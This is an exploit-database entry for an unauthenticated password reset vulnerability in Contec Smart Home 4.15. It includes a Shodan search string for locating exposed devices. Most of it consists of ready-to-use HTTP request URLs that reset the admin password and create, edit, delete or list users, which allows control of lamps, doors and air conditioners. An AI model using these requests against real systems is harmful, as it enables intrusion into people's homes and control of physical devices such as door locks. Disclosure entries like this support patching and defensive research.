Contec Smart Home 4.15 - Unauthorized Password Reset Vulnerability

2018-03-17T00:00:00
ID 1337DAY-ID-30000
Type zdt
Reporter Z3ro0ne
Modified 2018-03-17T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            # Title              : Contec smart home 4.15 Unauthorized Password Reset
# Shodan Dork        : "content/smarthome.php"
# Vendor Homepage    : http://contec.co.il
# Tested on          : Google Chrome
# Tested version     : 4.15
# Date               : 2018-03-14
# Author             : Z3ro0ne
# Contact            : [email protected]
# Facebook Page      : https://www.facebook.com/Z3ro0ne
  
# Vulnerability description :
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
 
 
# Exploit 
 
 To Reset Admin password 
 http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
  
 To Create a new user
 http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
  
  To edit a user
 http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
  
 To Delete a user 
 http://Ipaddress:port/content/delete_user.php?user_name=USER
  
 Users list  
 http://Ipaddress:port/content/user.php

#  0day.today [2018-03-19]  #